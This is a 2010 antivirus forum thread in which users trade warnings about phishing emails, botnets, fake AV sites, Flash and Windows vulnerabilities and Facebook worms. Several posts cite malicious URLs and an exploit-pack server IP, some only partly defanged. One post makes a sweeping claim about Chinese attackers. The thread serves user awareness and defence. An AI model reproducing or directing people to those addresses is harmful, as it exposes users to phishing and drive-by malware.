The link looks like it goes to a secure (https) HSBC site, but when you look at it, it actually goes to a .ro website, which is romanian...so obviously not from HSBC...
This email was correctly caught by the hotmail spam filter, but I still thought it was a good idea to warn about it...
So please leave it in junk and do not open it...
I have also forwarded it to the real bank's phishing address...
EDIT: Another worrying thing is that this is (I think) the first piece of spam that has been sent directly to my exact email address...where did they get it (also the same with a lot of my friends...)
-Scott-
-
Hi malware fighters,
Warn your mother for Mothersday Card malware:
http://ftc.gov/bcp/edu/multimedia/ecards/mom/butterfly/index.html
polonus
-
Hi malware fighters,
The 2007 Storm worm has reappeared in various new variants that differ from the original in specific aspects:
https://www.honeynet.org/node/539
http://www.avertlabs.com/research/blog/index.php/2010/04/28/dark-and-stormy-comeback-of-a-botnet/
and easier to defy than the original Storm worm:
http://www.v3.co.uk/v3/news/2262211/storm-botnet-forming
pol
-
New attack bypasses virtually all AV protection
Researchers say they've devised a way to bypass protections built in to dozens of the most popular desktop anti-virus products, including those offered by McAfee, Trend Micro, AVG, and BitDefender.
The Register (http://www.theregister.co.uk/2010/05/07/argument_switch_av_bypass/)
Original research paper. (http://www.matousec.com/info/articles/khobe-8.0-earthquake-for-windows-desktop-security-software.php)
nmb
-
Hi malware fighters,
Latest Malware Database alerts: http://malwaredatabase.net/blog/
pol
-
Hi malware fighters,
Win7 compatibility tool could be a trojan and malicious downloader:
http://www.net-security.org/malware_news.php?id=1335
polonus
-
U.S. May Face Cyber Attack, Says Richard Clarke
http://topnews.us/content/219583-us-may-face-cyber-attack-says-richard-clarke
-
***
Hack done to phpnuke.org site :
http://forum.avast.com/index.php?topic=59535.msg501749#msg501749
***
-
***
Hack done to phpnuke.org site :
http://forum.avast.com/index.php?topic=59535.msg501749#msg501749
***
looks solved:
http://www.theregister.co.uk/2010/05/11/phpnuke_infection_purged/
-
Windows 7 'compatibility Checker' Is a Trojan
http://www.pcworld.com/businesscenter/article/195991/windows_7_compatibility_checker_is_a_trojan.html
http://news.bitdefender.com/NW1535-en--Windows%C2%AE-7-Compatibility-Checker-Turns-Out-To-Be-a-Trojan.html
-
Fake HSBC emails...
Ok, since that is not working for them, they are trying another angle...pretending to warn users about erm...themselves...
Once again, these are NOT from HSBC, they are fake. The so called hsbc link actually points to:
hXXp://michael-shelton.com/images/uk-hsbc.co.uk/www/INTEGRATION-HSBC/CAM11;jession=14/
Which is obviously fake. (would be interesting to know whether avast! blocks this...)
Another thing is, that they have 'tagged' (right word?) it as high priority, as you can see in the image (the red exclaimation mark...)
Careful guys...
-Scott-
-
they are trying another angle...pretending to warn users about erm...themselves...
;D
-
they are trying another angle...pretending to warn users about erm...themselves...
;D
Yeah...although, I think that sentence needs rephrasing:
Ok, since that is not working very well for them, they are capitalising on it, and trying another angle...pretending to warn users about erm...themselves...
-
Twitter-controlled botnets
http://www.theregister.co.uk/2010/05/13/diy_twitter_botnets/
http://sunbeltblog.blogspot.com/2010/05/diy-twitter-botnet-creator.html
http://www.wired.com/threatlevel/2009/08/botnet-tweets/
A security researcher has unearthed a tool that simplifies the process of building bot armies that take their marching orders from specially created Twitter accounts.
TwitterNet Builder offers script kiddies a point-type-and-click interface that forces infected PCs to take commands from a Twitter account under the control of attackers. Bot herders can then force the zombies to carry out denial-of-service attacks or silently download and install software with the ease of their Twitter-connected smartphones.
-
Warning: http://stopmalvertising.com/malvertisements/alert-twcorpscom-replaces-grepadcom/page-2
pol
-
Hi malware fighters,
Loads of fake av silent download sites being found, example: http://safeweb.norton.com/report/show?name=syspro.edu.co
Discussion on recent website malware: http://evilcodecave.wordpress.com/
interesting linked, that I bookmarked...
polonus
-
Discussion on recent website malware: http://evilcodecave.wordpress.com/
interesting linked, that I bookmarked...
polonus
Sites that are at February 14, 2010 are about as current as an old newspaper.
-
Top attacks here: http://atlas.arbor.net/
See what is on the malcode radar here: http://www.securitywizardry.com/radar.htm
pol
-
Top attacks here: http://atlas.arbor.net/
See what is on the malcode radar here: http://www.securitywizardry.com/radar.htm
pol
Goes to prove that Chinese with bogus Windows are the major contributors:
CHINANET-BACKBONE
http://atlas.arbor.net/asn/4134
http://atlas.arbor.net/cc/CN
-
Hi malware fighters,
For the latest wepawet Flash and JS reports, go here:
http://wepawet.iseclab.org/samples.php
pol
-
Hi malware fighters,
As you can read via the link given websites outside the normal Latin spelling, according tio the new Domain standards for instance in Cyrillic or Arabic can be easier abused by phishers now:
http://www.securelist.com/en/blog/2156/New_domain_standards_new_challenges_new_potential_problems
polonus
-
Hi malware fighters,
Biggest threat around USB worm: http://news.techworld.com/security/3223707/mcafee-usb-worm-is-biggest-pc-threat/
pol
-
Oracle Java SE and Java for Business are prone to a remote heap-based buffer-overflow vulnerability affecting the Java Runtime Environment (JRE).
Attackers can exploit this issue to execute arbitrary code within the context of the user invoking the JRE.
Versions prior to Java 5.0 Update 24 and Java 6.0 Update 19 are vulnerable.
http://url4.eu/3Xqok
-
Microsoft Confirms x64 Windows 7 Aero Vulnerability
Vulnerability in Canonical Display Driver Could Allow Remote Code Executio
http://www.microsoft.com/technet/security/advisory/2028859.mspx
:-X
-
Hi malware fighters,
Latetst threats: http://security.technosoftcorp.com/ss/ss_index.htm
pol
-
Hi malware fighters,
Already 44 PHP leaks found up: http://www.php-security.org/
pol
-
Hi malware fighters,
Notorious torrent site with malware: 3471018cfbd0f17899258e2b62a1dd61 2010-05-11 Eleonore Exploits pack IE6 24/41 (58.54%) TR/PSW.Zbot.185344.R Blocked UK hxxp://91.216.3.108/ca1/index.php
See: http://support.clean-mx.de/clean-mx/viruses.php?domain=91.216.3.108&submit=query
Still malicious avast reports: hxtp://wepawet.cs.ucsb.edu/view.php?type=js&hash=3ebe99eb909fd7458dd245ccbc8c4615&t=1273536734 (do not click link, it is flagged for sign of JS:Pdfka-BT [Expl] has been found
Norton Safe Web gives it green, but that is false: This is a dangerous site,it is blocked on Blade,
polonus
-
not really a warning but worth noting:
Google turns on SSL encryption for search
http://www.theregister.co.uk/2010/05/21/google_search_ssl_encryption/
(http://regmedia.co.uk/2010/05/21/google_ssl_search_logo.png)
http://googleblog.blogspot.com/2010/05/search-more-securely-with-encrypted.html
A few notes to remember: Google will still maintain search data to improve your search quality and to provide better service. Searching over SSL doesn’t reduce the data sent to Google — it only hides that data from third parties who seek it.
-
Fake joke worm wriggles through Facebook
http://www.theregister.co.uk/2010/05/21/fake_joke_worm_facebook/
The malware, for now at least, does nothing more malicious than posting a message on an infected user's Facebook wall that point to a site called fbhole.com. Nonetheless, the speed of its spread on the social networking site has net security experts worried.
The message that the worm posts takes the form
:
try not to laugh xD http://www.fbhole. com/omg/allow.php?s=a&r=[random number]
Facebook gives users' names to advertisers
Violates own privacy policy
http://www.theregister.co.uk/2010/05/21/facebook_ads/
http://online.wsj.com/article/SB10001424052748704513104575256701215465596.html
-
Hi friends,
The fbhole.com attack ended in 15 seconds. Check out fsecure's weblog : http://www.f-secure.com/weblog/archives/00001955.html
nmb
-
Hi friends,
The fbhole.com attack ended in 15 seconds. Check out fsecure's weblog : http://www.f-secure.com/weblog/archives/00001955.html
nmb
LOL ;D
Updated to add: Domain fbhole.com shared an IP address with ironbrain.net [82.208.32.99]. Ironbrain.net hosted a website with references to Facebook but no obvious illegal content. While fbhole.com was registered with privacy protection, ironbrain.net had contact information in the WHOIS database, complete with a Czech phone number.
So I called the number.
The call went roughly like this:
– Hello?
– Hi. This is Mikko Hypponen from F-Secure Labs.
– What is this about?
– I'm looking for a person related to ironbrain.net.
– ???
– We're investigating a Facebook worm on fbhole.com. That domain shares an IP address with ironbrain.net which is registered under your name.
– And you are?
– I'm from an antivirus company. Are you related to ironbrain.net?
– I'll have to check… maybe my company is…
– Please do.
– Bye…
[Click]
About 15 seconds later, both fbhole.com and ironbrain.net went offline. The attack is over
.
-
Hi malware fighters,
New malware trend: http://blog.unmaskparasites.com/2010/05/22/malware-on-hijacked-subdomains-new-trend/
polonus
-
IBM hands out malware-stuffed USB at security conference
http://www.theregister.co.uk/2010/05/21/ibm_usb_malware_snafu/
-
First human 'infected with computer virus'
(http://www.siliconrepublic.com/fs/img/news/201005/378x/computer-virus-image.jpg)
A British scientist says he is the first man in the world to become infected with a computer virus
Is he a humanoid?
Not as terrible as I though
http://news.bbc.co.uk/2/hi/technology/10158517.stm
-
Facebook Apps hacked or exploited and is hosting HTML:Iframe-inf
Edit: I found this today and still active. Trying to connect twitter with Facebook via Facebook Apps. Google Chrome is giving alert, but the malware can be execute automatically by the server. avast is detecting & blocking it.
-
Facebook Apps hacked or exploited and is hosting HTML:Iframe-inf
more details may be? ;D
-
Facebook Apps hacked or exploited and is hosting HTML:Iframe-inf
more details may be? ;D
No info is available in the web so far, but I be notified by Google Chrome & avast
-
I think this is recently
-
could you try to reproduce it and post a screen shot of the alert in the virus/worm section? thanks ;)
-
could you try to reproduce it and post a screen shot of the alert in the virus/worm section? thanks ;)
I will try, but I no have any tool to capture screen shot. Because I not have my laptop in this moment. But want to install one.
-
http://www.bhelpuri.net/Snippy/ (only works with XP or older versions of windows with GDI+ installed).
Vista should have a "snipping tool" already installed though.
http://windows.microsoft.com/en-us/windows-vista/Use-Snipping-Tool-to-capture-screen-shots
-
could you try to reproduce it and post a screen shot of the alert in the virus/worm section? thanks ;)
I will try, but I no have any tool to capture screen shot. Because I not have my laptop in this moment. But want to install one.
you got a tool in Vista, it's called "Snipping tool" :)
-
Or you guys should start a new thread, may be?
nmb
-
Or you guys should start a new thread, may be?
nmb
why ??? I just warned a user that his system was equipped with a "snipping tool"...and that's a warning thread or not ??? ;D
-
I already did it though...
-
why ??? I just warned a user that his system was equipped with a "snipping tool"...and that's a warning thread or not ??? ;D
Buddy logos,
You got me wrong. Let's leave it here. Or else the topic gets hijacked.
cheers :)
nmb
-
I was just having fun :D
-
Hi malware fighters,
@logos
Well back to business then, I mean get the latest threats from here: http://blog.scansafe.com/
Interesting read for the latest exploits online,
polonus
-
Hi malware fighters,
@logos
Well back to business then, I mean get the latest threats from here: http://blog.scansafe.com/
Interesting read for the latest exploits online,
polonus
::) well thanks for the head ups then :D (not really into malware stuff right now... :P )
-
Hi malware fighters,
What about this threat? http://lists.clean-mx.com/clean-mx/viruses.php?domain=v3p2*com&sort=first%20desc
About what this site is into: http://blog.scansafe.com/journal/2010/5/12/possible-root-compromise-of-greatandhracom.html
Unmasked parasites: http://www.UnmaskParasites.com/security-report/?page=v3p2.com
pol
-
Hi malware fighters,
Be aware of the top trend search words. These could lead to fake AV links: http://www.spamfighter.com/News-14469-Hackers-Poison-Google-Search-Results.htm
So watch your clicks, folks..stay clear of poisoned Google search results...260 000 during 2009
http://news.idg.no/cw/art.cfm?id=983DCD85-1A64-67EA-E4B9D36C6D646C40
polonus
-
@ scythe944, Logos & nmb
The new topic is now available at:
http://forum.avast.com/index.php?topic=60230.0
-
Llanziel
Actually, you should have posted in here rather than starting another thread. :)
-
Perpetual Horizon's Mebroot analysis
Avast fails to detect.. :'(
Here you go : http://perpetualhorizon.blogspot.com/2010/05/trip-down-memory-lane-with-torpig-part.html
nmb
-
Hi :)
What The Internet Know About You?
http://static.whattheinternetknowsaboutyou.com/results.html
-
A cunning new phishing technique - Tabnabbing
http://www.norman.com/security_center/security_center_archive/2010/80577/en-us
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/
-
Hi Pondus,
The latest version of the Fx NoScript extension has protection against TabNabbing,
polonus
-
Hi malware fighters,
Hackers are looking for older versions of Fx to hack them via specific exploit packs like Eleonore:
http://www.avertlabs.com/research/blog/index.php/2010/05/28/an-overview-of-exploit-packs/
http://www.malwaredomainlist.com/forums/index.php?topic=3354.0
http://www.malwaredomainlist.com/mdl.php?search=Eleonore&colsearch=Description&quantity=50
http://evilfingers.blogspot.com/2009/08/eleonore-exp-v12-russian-exploits.html
polonus
-
Hi malware fighters,
A new scareware: A-fasta: http://malwareint.blogspot.com/2010/05/recent-tour-of-scareware-xxii.html
polonus
-
Hi malware fighters,
A new scareware: A-fasta: http://malwareint.blogspot.com/2010/05/recent-tour-of-scareware-xxii.html
polonus
See:
What is A-Fast Antivirus?
http://forums.malwarebytes.org/index.php?showtopic=49893
-
Critical updates for Adobe Photoshop CS4
http://www.norman.com/security_center/security_center_archive/2010/80709/en-us
http://www.adobe.com/support/security/bulletins/apsb10-13.html
-
Hi malware fighters,
Keep an eye out for these malcode sites:
http://rss.uribl.com/nic/XIN_NET_TECHNOLOGY_CORPORATION.html
Knownsec give some as confirmed clean or 其他机构评判结果
: https://webmon.knownsec.com/report?id=1948293
Some detected as Trojan horse serving site: 检测到被挂马的网站
polonus
-
Mac Attack: see> http://www.theregister.co.uk/2010/06/01/mac_spyware/
-
Mac Attack: see> http://www.theregister.co.uk/2010/06/01/mac_spyware/
I share his opinion posted there:
Mac's most ardent supporters have long claimed the platform is more inherently secure than Windows, a perception Apple marketers have been happy to perpetuate. But a more plausible explanation, advanced by Charlie Miller and other white-hat hackers who regularly exploit Apple security bugs, is that the platform isn't sufficiently big enough to justify the investment of hardened crime gangs.
-
***
Mac Attack: see> http://www.theregister.co.uk/2010/06/01/mac_spyware/
I share his opinion posted there:
Mac's most ardent supporters have long claimed the platform is more inherently secure than Windows, a perception Apple marketers have been happy to perpetuate. But a more plausible explanation, advanced by Charlie Miller and other white-hat hackers who regularly exploit Apple security bugs, is that the platform isn't sufficiently big enough to justify the investment of hardened crime gangs.
This is the same that I have been saying for the past 10 years and this idea includes browsers as well as other less popular computer applications.
***
-
Hi malware fighters,
Facebook worm threat: http://www.sophos.com/blogs/gc/g/2010/05/31/viral-clickjacking-like-worm-hits-facebook-users/
Moslim jihad against facebook blasphemy groups: http://www.virtualjihad.net/
pol
-
Free Mac OS X screensavers bundled with spyware (http://www.zdnet.com/blog/security/malware-watch-free-mac-os-x-screensavers-bundled-with-spyware/6560?tag=nl.e589)
-
Moslim jihad against facebook blasphemy groups: http://www.virtualjihad.net/
interesting...
-
Hi malware fighters,
Sasfis trojan tricks Windows with new technique: http://blog.trendmicro.com/sasfis-malware-uses-a-new-trick/
polonus
-
Hi malware fighters,
Look for these fake-AV threats from blog sites: http://blog.trendmicro.com/doorway-pages-and-other-fakeav-stealth-tactics/
Recently spotted a couple in the virus and worms reported there...
pol
-
Not sure if this has already been posted
Removal instructions for Sysinternals Antivirus
http://forums.malwarebytes.org/index.php?showtopic=52821
-
I get this warning daily - and really do not know where it is coming from.
http://www.shemel.co.cc/le.php\{gzip}
-
Security Advisory for Flash Player, Adobe Reader and Acrobat
http://blogs.adobe.com/psirt/2010/06/security_advisory_for_adobe_re.html
A Security Advisory has been posted in regards to a new Adobe Reader, Acrobat and Flash Player issue (CVE-2010-1297). A critical vulnerability exists in Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems. This vulnerability could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat.
The Flash Player 10.1 Release Candidate available on http://labs.adobe.com/technologies/flashplayer10/ does not appear to be vulnerable.
Adobe Reader and Acrobat 8.x are confirmed not vulnerable. Mitigations for Adobe Reader and Acrobat 9.x are included in the Security Advisory.
-
Hi Alan Baxter,
With a penetration rate of 97% this is a gaping vulnerability risk and could affect millions and millions of computers, so go here to update: http://labs.adobe.com/downloads/flashplayer10.html#android
polonus
-
Hi Alan Baxter,
With a penetration rate of 97% this is a gaping vulnerability risk and could affect millions and millions of computers, so go here to update: http://labs.adobe.com/downloads/flashplayer10.html#android
polonus
Hi D.,
is this a stable release..??
asyn
-
Hi Asyn,
While waiting for a security update, users are advised to go and download the release candidate from
http://labs.adobe.com/technologies/flashplayer10 found here: http://labs.adobe.com/downloads/flashplayer10.html
It is stable enough,
pol
-
Hi Alan Baxter,
With a penetration rate of 97% this is a gaping vulnerability risk and could affect millions and millions of computers, so go here to update: http://labs.adobe.com/downloads/flashplayer10.html#android
polonus
Hi D.,
is this a stable release..??
asyn
yep, been using several successive beta and RCs of it for many weeks, no problem.
-
Hi Logos,
Thanks for confirming this, for our users. Secunia PSI cannot solve all our patching/upgrading problems.
And now has three bugs: http://www.theregister.co.uk/2010/06/02/secunia_bug_check_tool/
(only form a problem when you feed up wrongly yourself...)
polonus
-
Thanks guys..!! :)
asyn
-
Virtualjihad.net has been suspended. They served a ddos tool.
-
I have been using Flash RC from the day one when it was released....
I was just hoping if my statistics that they wean from my PC can be of some use to make flash better....
HTML 5 is the future...
-
More adobe........
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat
http://www.norman.com/security_center/security_center_archive/2010/83636/en
quote:
As of this writing no updates are available. There are reports that this vulnerability is being actively exploited.
-
Thank you, Pondus, but all that was reported here three days ago. In case you missed it, that report included information that the Flash Player 10.1 Release Candidate does not appear to be vulnerable and its immediate installation is recommended.
http://forum.avast.com/index.php?topic=52252.msg509931#msg509931
Security Advisory for Flash Player, Adobe Reader and Acrobat
http://blogs.adobe.com/psirt/2010/06/security_advisory_for_adobe_re.html
A Security Advisory has been posted in regards to a new Adobe Reader, Acrobat and Flash Player issue (CVE-2010-1297). A critical vulnerability exists in Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems. This vulnerability could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat.
The Flash Player 10.1 Release Candidate available on http://labs.adobe.com/technologies/flashplayer10/ does not appear to be vulnerable.
Adobe Reader and Acrobat 8.x are confirmed not vulnerable. Mitigations for Adobe Reader and Acrobat 9.x are included in the Security Advisory.
-
Hi Logos,
Thanks for confirming this, for our users. Secunia PSI cannot solve all our patching/upgrading problems.
And now has three bugs: http://www.theregister.co.uk/2010/06/02/secunia_bug_check_tool/
(only form a problem when you feed up wrongly yourself...)
polonus
Make sure you have Secunia PSI V1.5.0.2
http://secunia.com/vulnerability_scanning/personal
-
Hi malware fighters,
Targeted attack in an Exel document: http://www.symantec.com/connect/blogs/fifa-world-cup-used-lure-victims-targeted-attack
polonus
-
Hackers expose 114,000 iPad users through AT&T site
http://www.zdnet.co.uk/news/security-threats/2010/06/10/hackers-expose-114000-ipad-users-through-atandt-site-40089189/
A group of hackers exploited a hole in an AT&T website to get email addresses of about 114,000 iPad users, including what appears to be top officials in government, finance, media, technology and military
.
-
Hi malware fighters,
To be protected against the facebook link invaders: http://forums.informaction.com/viewtopic.php?f=8&t=4454
polonus
-
Google finds serious hole in Windows XP: http://seclists.org/fulldisclosure/2010/Jun/205
polonus
-
Hi malware fighters,
SQL-mass infection reported - http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
polonus
-
http://forum.avast.com/index.php?topic=52252.msg509931#msg509931
http://forum.avast.com/index.php?topic=52252.msg510668#msg510668
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat - UPDATED
http://www.norman.com/security_center/security_center_archive/2010/83636/en
-
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat - UPDATED
http://www.norman.com/security_center/security_center_archive/2010/83636/en
From the Flash Player siteAdobe recommends all users of Adobe Flash Player 10.0.45.2 and earlier versions upgrade to the newest version 10.1.53.64
I would remove all versions of Flash Player by using the Flash Player uninstaller:
http://kb2.adobe.com/cps/141/tn_14157.html
Make sure to have all browsers sessions closed when running the uninstaller and do a reboot to permit locked files to be removed.
http://get.adobe.com/flashplayer <== make sure that you un-select the Free Google Toolbar if you do not want it.
-
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat - UPDATED
http://www.norman.com/security_center/security_center_archive/2010/83636/en
From the Flash Player siteAdobe recommends all users of Adobe Flash Player 10.0.45.2 and earlier versions upgrade to the newest version 10.1.53.64
I would remove all versions of Flash Player by using the Flash Player uninstaller:
http://kb2.adobe.com/cps/141/tn_14157.html
Make sure to have all browsers sessions closed when running the uninstaller and do a reboot to permit locked files to be removed.
http://get.adobe.com/flashplayer <== make sure that you un-select the Free Google Toolbar if you do not want it.
Google toolbar no longer included in the installer, I think. I had problems last night of installing the new Flash plugin. Instead, I downloaded the Active X flash player which is for IE.
-
Google toolbar no longer included in the installer, I think. I had problems last night of installing the new Flash plugin. Instead, I downloaded the Active X flash player which is for IE.
It sure is.
I sure would modify my profile if I advertise that I am Granddadsgiant (at) aol.com
-
Vulnerability in Windows Help and Support Center Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/2219475.mspx
-
Hi malware fighters,
Install the Fix it for this issue: http://support.microsoft.com/kb/2219475
Certainly soon there will be malware seen to exploit this for Windows XP SP2 & 3,
pol
-
Before using the fixit solution, make sure your System is vulnerable.
Vista and Win7 certainly aren't. :)
-
Before using the fixit solution, make sure your System is vulnerable.
How would someone do that?
Vista and Win7 certainly aren't. :)
Certainly soon there will be malware seen to exploit this for Windows XP SP2 & 3,
-
This should answer your question nmb
-
This should answer your question nmb
Sorry, Bob..!
But polonus' post did already refer to this... ;)
asyn
-
Hi Asyn,
Here is the MS page: http://www.microsoft.com/technet/security/advisory/2219475.mspx
There was some controversy over Google publishing this exploit,
pol
-
Hi Asyn,
Here is the MS page: http://www.microsoft.com/technet/security/advisory/2219475.mspx
There was some controversy over Google publishing this exploit,
pol
Run the FixIt. :)
-
Hi Asyn,
Here is the MS page: http://www.microsoft.com/technet/security/advisory/2219475.mspx
There was some controversy over Google publishing this exploit,
pol
Thanks D, already been there..! ;)
asyn
-
Run the FixIt. :)
Whom do you mean..?
asyn
-
Run the FixIt. :)
Whom do you mean..? asyn
Run it on your XP SP3 system and maybe your Comodo will even pemit it.
-
Run it on your XP SP3 system and maybe your Comodo will even pemit it.
No need, as
1. I don't need/run it
2. Block it anyway with comodo..! ;D
asyn
-
Hi malware fighters,
A new kind malcoded adware, rather malware, may transform your laptop into a Wifi router to function as a laptop access point, the victim does not see the launched ads on every HTML page and also on YouTube. It is too easy to call this a normal "man in the middle attack, we certainly will hear more about "Typhoid adware"....http://pages.cpsc.ucalgary.ca/~aycock/papers/eicar10.pdf
polonus
-
SumatraPDF v1.1 Denial of Service PoC
http://www.exploit-db.com/exploits/13872/
nmb
-
Hi malware fighters,
A new trojan does not work under Windows XP, but will infect Vista: http://blog.webroot.com/2010/06/14/spammed-trojan-wont-run-under-windows-xp/
polonus
-
Hi malware fighters,
Google Analytics harbours new malicious script!
On a number of hacked websites eSoft found Google Analytics abused to harbour malicious scripts. Used JavaScript code normally used the Google domain, bur during decoding of the script a non-functioning 'sr tag' is being used, directing to a functioning 'sr tag' with a malicious script on another domain. Analyzing these websites critically look at theGoogle Analytics code, please....http://threatcenter.blogspot.com/2010/06/alert-to-web-security-researchers.html
pol
-
Linux trojan raises malware concerns
A backdoor Trojan discovered in a popular Linux download illustrates that the OS is not impervious.
http://pcworld.co.nz/pcworld/pcw.nsf/feature/1461D73DC2B51F96CC25774100750C6B
-
Linux trojan raises malware concerns
A backdoor Trojan discovered in a popular Linux download illustrates that the OS is not impervious.
Welcome to the club. :'(
-
Hi malware fighters,
The XP hole found up by Google is now actively being abused, so apply the FixIt:
http://www.sophos.com/blogs/sophoslabs/?p=10045
pol
-
The XP hole found up by Google is now actively being abused, so apply the FixIt:
http://www.sophos.com/blogs/sophoslabs/?p=10045
Done just now. Thank for for the update.
-
Disclose information about vulnerabilities? Yes/No/When?
http://www.norman.com/security_center/security_center_archive/2010/83782/en
-
dont put your money here
Eastern European banks under attack by next-gen crime app
http://www.theregister.co.uk/2010/06/16/blackenergy2_ddos_attacks/
Researcher shows how to strike back at web assailants
Exploiting the exploiters
http://www.theregister.co.uk/2010/06/17/exploiting_online_attackers/
-
Hi Pondus,
On the disclosure discussion front, i.m.o. the best remedy is to educate users to be fully protected against possible 0-days. That is to make use of appropriate in-browser protection like NS and RP (so code can not run and malicious requests are not being performed), use a normal user account so an exploit can not be maximized on the OS and in the registry. Use a combination of a fully upgraded resident AV solution together with some additional non-resident malware scanners (MBAM, SAS etc.) and check with Secunia's PSI for instance whether all third party software has been fully updated and patched.
As long as users are not educated into these precautionary practices the discussion between full, semi or responsible disclosure is a non-issue because the average user will still be a sitting duck for malcreants and cybercriminals alike,
polonus
-
Hi Pondus,
On the disclosure discussion front, i.m.o. the best remedy is to educate users to be fully protected against possible 0-days. That is to make use of appropriate in-browser protection like NS and RP (so code can not run and malicious requests are not being performed), use a normal user account so an exploit can not be maximized on the OS and in the registry. Use a combination of a fully upgraded resident AV solution together with some additional non-resident malware scanners (MBAM, SAS etc.) and check with Secunia's PSI for instance whether all third party software has been fully updated and patched.
As long as users are not educated into these precautionary practices the discussion between full, semi or responsible disclosure is a non-issue because the average user will still be a sitting duck for malcreants and cybercriminals alike,
polonus
+1 (100% agree..!!!)
asyn
-
guys stop dreaming, the average user will never ever use NS or similar, never. The average user wants his box to run like a TV, turn on, zap, turn off...browse the web, check hotmail, and basta. It's already hard to make them undertsand that they need an anti-virus at all (most of them running nothing, because the Norton trial expired ;D )....there's no such thing as educating the masses about computer and internet security. The masses are purely and simply rejecting the ideas: that 1st the web is not secure, and second that they need to be educated for their own sake. It's a dead end. Show user lambda that his system is infected, he'll still wonder why there's a need to clean it...not a joke ;)
-
guys stop dreaming, ... <snip>
Never stop dreaming..!! ;)
asyn
-
Hi Logos,
Still we have to go on educating, just for the guys and gals and kids that will pick this up, weren't we a bit like average users when we started out here. How may computers do you need that have been turned into a state of "no better than a door stopper" by malcoded script to finally glimpse at the idea that it is a PEBKAC problem mainly, and you can do something fundamentally about it. If I can get 100 users to further use NS and RP combined I feel a better human being for doing so,
polonus
-
From Omids`s Blog
A little note to the guys at ESET http://boelectronic.blogspot.com/search/label/Fun
-
Go Omid! I liked the Windows updates thing in those earlier posts. I'm planning on 2012 ending for XP network followed by upgrade to whatever is best option then. Whenever the security updates cannot be kept up to cover potential or real vunerabilities. I've got two years avast! Pro on an XP Pro 32bit so I'll take my XP that far.
-
also from Omid`s blog
Watch out for this dangerous hacker.....he may erase your hard drive.......... ;D ;D ;D
http://whatthehell.eu/hacker-story
-
Hi Pondus,
And what would you think of this, malcreants signing their malcode with MS Authenticode, certified malware, who would believe this?
http://www.f-secure.com/weblog/archives/00001973.html
So look out, you good people, it is a nightmare out there or soon to be,
polonus
-
also from Omid`s blog
Watch out for this dangerous hacker.....he may erase your hard drive.......... ;D ;D ;D
http://whatthehell.eu/hacker-story
Must be DST... ;D ;D ;D ;D ;D...
(http://www.stophiphop.com/modules/marketplace/images/TS-black-IHacked127001-02.jpg)
-
Testing Reveals Security Software Often Misses New Malware
http://www.cio.com/article/597263/Testing_Reveals_Security_Software_Often_Misses_New_Malware?taxonomyId=3089
-
Testing Reveals Security Software Often Misses New Malware
http://www.cio.com/article/597263/Testing_Reveals_Security_Software_Often_Misses_New_Malware?taxonomyId=3089
Then there are those that feel the sky is falling ::)
There needs to be a sanity check! ???
-
***
Misplaced warning at this link :
http://forum.avast.com/index.php?topic=61138.msg516039#msg516039
***
-
***
Misplaced notice at this link :
http://forum.avast.com/index.php?topic=61279.msg517655#msg517655
***
-
Critical udates for Adobe Acrobat and Reader
http://www.norman.com/security_center/security_center_archive/2010/84420/en
-
Hi malware fighters,
In Amsterdam a couple of important HTTP-protocol flaws will be revealed: the vulnerabilities are for all programs and services that make use of the HTTP-protocol, e.g. Internet Explorer, Firefox, Microsoft Office, buts also Twitter, Hotmail, Facebook and iPhone Apps. MS and Facebook could mend these flaws in their code, but closing the holes for the HTML-protocol itself won't be that easy and swift a task...
So that is why I use HTTPS-everywhere extension inside the Mozilla browser for now, NoScript will protect the user as well, so all my search queries go via encrypted.google.com, my good friends,
polonus
-
Using HTTPS stops avast from being able to scan your web activity.
At this point, I'd rather depend on avast! to protect me. :) (This is my opinion)
-
Using HTTPS stops avast from being able to scan your web activity.
At this point, I'd rather depend on avast! to protect me. :) (This is my opinion)
Couldn't agree more, why use the web shield if you are going to cripple it by using an add-on to use https.
Not to mention a point polonus makes that NoScript also protects you to a degree in firefox, by switching to https you are actually reducing that effectiveness as the rules in NS by default are different for https (active content in https connection, see image). So not only are you blocking avast you are also reducing the effectiveness of noscript, a poor swap in my opinion.
-
DavidR,
The avast shields keeps working I guessed, the https everywhere is only for a couple of sites that give this additional service (alas google via encrypted.google, because of the school filter circumvention issue), it would be a sad thing indeed that we weren't protected on/via https connections. Is that so? I have the extension now disabled for the mo, but like to hear a bit more on the issue why https is not protected by avast via their port 12080 shield connection,
polonus
-
It isn't only for a couple of sites and they are looking at adding other sites, not to mention some of the sites they do include notably facebook (I believe, or some such social networking site/s), which are large targets for malware.
It is a simple fact https is encrypted and the web shield can't monitor/scan encrypted traffic so it doesn't even try. So you loose that level of protection on https pages, it may well be picked up by the file system shield, but that isn't assured and certainly not any hacked site, redirect, exploit issues.
You only need monitor the web shield whilst browsing an https site and you will see zero scanning of https pages/content. Why do you think I have been banging on about it every time you mention this add-on.
-
The avast shields keeps working I guessed...
polonus
I'm surprised to hear that from you Pol...how do you want to scan encrypted traffic :) remains that the file shield will interact at disk level...but hey that's not the same level of protection anymore ;) This said there's no risk surfing on https on a few sites (allowing it), I do that myself, on twitter for instance, where there's nothing hosted >>> if malware is linked there it's out of twitter, so the webshield will interact again. I'd be more careful with Facebook (that I hate anyway), because stuff is hosted there, so yes there are definitely some sites where ssl is not advised at all.
The main point of using ssl is to get the privacy that you can't get on http in the case that bad guys would be eavesdropping the network...but the downside is that "malwarewise", you're almost on your own there.
ps: but again, I think switching to ssl is fine on a very restricted number of sites, like Google docs (on your account) and as a rule on nothing shared from another account.
